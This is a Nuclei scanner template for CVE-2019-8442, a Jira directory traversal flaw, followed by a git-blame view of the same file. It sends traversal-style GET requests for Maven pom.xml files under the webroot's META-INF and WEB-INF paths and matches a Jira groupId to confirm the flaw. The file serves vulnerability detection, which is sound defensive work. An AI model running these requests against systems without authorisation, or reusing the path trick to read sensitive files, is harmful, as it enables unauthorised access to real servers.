nuclei-templates/cves/2019/CVE-2019-8442.yaml

id: CVE-2019-8442
info:
  name: JIRA Directory Traversal
  author: Kishore Krishna (siLLyDaddy)
  severity: high
  description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check.
  reference: https://jira.atlassian.com/browse/JRASERVER-69241
  tags: cve,cve2019,atlassian,jira,lfi
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.50
    cve-id: CVE-2019-8442

requests:
  - method: GET
    path:
      - "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml"
      - "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '<groupId>com.atlassian.jira</groupId>'
        part: body
misc changes 2021-01-02 04:59:06 +00:00			`id: CVE-2019-8442`
Create CVE-2019-8442.yaml 2020-10-02 19:50:52 +00:00			`info:`
			`name: JIRA Directory Traversal`
			`author: Kishore Krishna (siLLyDaddy)`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`severity: high`
Missing reference 2021-03-30 07:16:57 +00:00			`description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check.`
			`reference: https://jira.atlassian.com/browse/JRASERVER-69241`
tag improvements 2021-03-18 07:54:36 +00:00			`tags: cve,cve2019,atlassian,jira,lfi`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.50`
			`cve-id: CVE-2019-8442`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00
Create CVE-2019-8442.yaml 2020-10-02 19:50:52 +00:00			`requests:`
misc changes 2021-08-23 09:24:04 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml"`
			`- "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00
Create CVE-2019-8442.yaml 2020-10-02 19:50:52 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
misc changes 2021-08-23 09:24:04 +00:00
Create CVE-2019-8442.yaml 2020-10-02 19:50:52 +00:00			`- type: word`
			`words:`
misc changes 2021-08-23 09:24:04 +00:00			`- '<groupId>com.atlassian.jira</groupId>'`
Fixed an issue with gzip encoding 2021-02-12 12:38:21 +00:00			`part: body`